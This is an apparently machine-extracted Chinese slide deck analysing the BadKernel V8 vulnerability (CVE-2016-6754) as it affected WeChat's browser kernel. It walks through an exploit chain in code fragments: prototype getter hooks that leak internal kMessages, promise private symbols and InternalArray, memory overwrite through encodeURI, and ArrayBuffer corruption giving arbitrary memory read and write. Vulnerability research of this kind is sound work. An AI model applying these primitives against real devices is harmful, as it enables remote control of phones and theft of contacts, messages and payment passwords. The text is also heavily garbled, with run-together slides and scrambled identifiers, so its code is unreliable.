BadKernel系统漏洞分析

1、BadKernel系统漏洞分析一个笔误引发的漏洞背景介绍JavaScript原型BadKernel漏洞利用内容简介谷歌开源 JavaScript 引擎 Chromium 工程 2008年9月2日发布第一个版本 高性能浏览器 Chrome, 安卓Webview, Opera, Chromium, QQ 浏览器, UC 浏览器安卓应用 Twitter, Facebook, Gmail, 微信, 支付宝, 手机QQ, 京东V8 JavaScript引擎安卓Webview漏洞共统计约22万台设备 Chrome 37:81%Chrome 53: 仅38台91% 的设备存在漏洞74% 的设备存在4个漏洞w

2、ebkit 22%3013%3340%376%456%467%09%16%311%474%BadKernel CVE-2016-6754V8 3.20 - 4.2每 16 台就有1台受影响数亿用户受影响X5内核：基于V8 1微信V8组件 TBS X5 V8 1攻击方式 二维码 恶意URL漏洞危害 用户隐私泄露，如 用户财产损失，如 远程控制手机，准蠕通讯录，短信，录音，录像等窃取支付密码、钱包密码等虫式传播微信受BadKernel影响背景介绍JavaScript原型BadKernel漏洞利用内容简介对象定义var obj = 值属性obj.x = 3;obj.f = function(); o

3、bj.f();访问器属性obj. defineGetter (y, function() return 9 );obj.y = 9对象属性DebugPrint: 0 x40015515: JSObjectmap = 0 x5f310f55 FAST_HOLEY_ELEMENTSprototype = 0 x5fc6bdf1#x: 3 (data field at offset 0)#f: 0 x2760dd35 (data constant)#y: 0 x276128cd (accessor constant)Smi:31 bit signed int 0HeapObject: 32 bit

4、direct pointer (4 byte aligned)|01基于类的面向对象声明基类Base声明继承类Derived创建对象p基于原型的面向对象创建原型对象Base声明构造器函数创建对象dObject NumberObjectErrorNumber PrimitiveValue: 0JSON对象原型Mathfunction () FunctionArrayString函数也是对象Object Mathfunction () FunctionArrayStringNumberPrimitiveValue: 0JSONObjectErrorNumber函数原型可修改的原型Native Ja

5、vaScript/chromium/src/v8/src/js/从native javascript中可以直接调用C/C+函数/chromium/src/v8/src/runtime/%GetPrototype()%DebugPrint()%SystemBreak()%DisassembleFunction(function()%OptimizeFunctionOnNextCallRuntime函数背景介绍JavaScript原型BadKernel漏洞利用内容简介ObjectkMessages定义var kMessages = observe_invalid_accept:Third argu

6、ment to Object.observe must be an array of strings.,笔误var format = Messagesobserve_accept_invalid;漏洞成因kMessagesobserve_invalid_acceptundefined 2013.5 引入2015.3 修复 作为一个普通bug2016.8 成功利用如何利用?ObjectObjectobserve_accept_invalidObject.observe(obj, callback , acceptList )add, update安装勾子Ototype. defineGetter

7、 (observe_accept_invalid,function() kMessages = this ; );触发Object.observe( , function() , 1 )var format = Messagesobserve_accept_invalid;泄漏kMessageskMessagesobserve_invalid_acceptobject_not_extensible:Cant add property , %0, , object is not extensible, return FormatString( format, args);Hook kMessag

8、eskMessagesstrict_read_only_property.push(%3); kMessagesobject_not_extensible.push(%3); Atotype. defineGetter ( 3 , function() args = this; )Hook kMessageskMessages 定义var kMessages = strict_read_only_property: Cannot assign to read only property , %0, of , %1, %3%3promisepromiseStatusstatuspromiseVa

9、luevaluepromiseOnResolveonResolvepromiseOnRejectonRejectPromiseSet(promise, status, value, onResolve, onReject)promise promiseStatus = status; promise promiseValue = value;promise promiseOnResolve = onResolve;promise promiseOnReject = onReject;/InternalArray/InternalArray泄漏 onResolve 以进一步泄漏 Internal

10、Array泄漏私有符号泄漏promiseStatusAtotype. defineGetter ( 3 , function() args = this; ) Object.freeze(mise);promiseStatus = args0;Throw NewTypeError(“strict_read_only_property”)return FormatString(*“, %0, of , %1“, “%3”+, promiseStatus, promise );promiseStatusstatuspromise泄漏promiseStatuspromise泄漏promiseValu

11、eAtotype. defineGetter ( 3 , function() args = this; ) Object.freeze(this);promiseValue = args0;Throw NewTypeError(“object_not_extensible”)return FormatString(*“, %0, “, “%3”+, promiseValue );promiseValuevaluepromisepromiseStatusstatus泄漏promiseValuepromisepromiseStatusstatus泄漏InternalArrayAtotype. d

12、efineGetter ( 3 , function() args = this; ) Object.freeze(this);promiseOnResolve = args0;onResolve=propromiseOnResolve;InternalArray = Object.getPrototypeOf(onResolve);promiseOnResolveonResolveThrow NewTypeError(“object_not_extensible”)return FormatString(*“, %0, “, “%3”+, promiseOnResolve );promise

13、promiseStatusstatuspromiseValuevalue泄漏InternalArraypromisepromiseStatusstatuspromiseValuevalueencodeURI()var array = new InternalArray(uriLength);var result = %NewString(array.length, NEW_ONE_BYTE_STRING); for (var i = 0; i array.length; i+) %_OneByteSeqStringSetChar(i, arrayi, result); /call getter

14、InternalArray泄漏内存get 0: function() this.length=1; return 0 x480 x48%NeLewaSkterdingHook InternalArrayOtotype. defineGetter .call(innerProto, 0, function() this.length=1; return 0 x48 I%ntNeernwaSlAtrrirnagyencodeURI()var array = new InternalArray(uriLength);var result = %NewString(array.length, NEW_

15、ONE_BYTE_STRING); for (var i = 0; i array.length; i+) %_OneByteSeqStringSetChar(i, arrayi, result); /call getterHook InternalArrayOtotype. defineGetter .call(innerProto, 0, function()for(var i=0; i overStr.length; i+)this i + oldLength = overStr.charCodeAt(i); 覆盖内存InternalArrayoverStrget 0: function

16、() for(); return 0 x480 x48overStrBL覆盖JSArrayBufferM: pMapP: pPropertiesE: pElementsB: pBackingStore L: ByteLengthF: FlagJSArrayBuffer BMPEBLFMemoryJSArrayBuffer AElement012316MPEBLFMLShould leak M, P, E, address of JSArrayBuffer B泄漏JSArrayBufferJSArrayBufferElement0123MPEBLFML堆喷ArrayBufferBMagic用ArrayBuffer A 控制ArrayBuffer BvA.setUint32(3*4, address, true);vA.setUint32(4*4, length, true);任意地址读vB.getUint32(0, true);任意地址写vB.setUint32(0, writed_value, true);任意地址读写JSArrayBuffer AMPE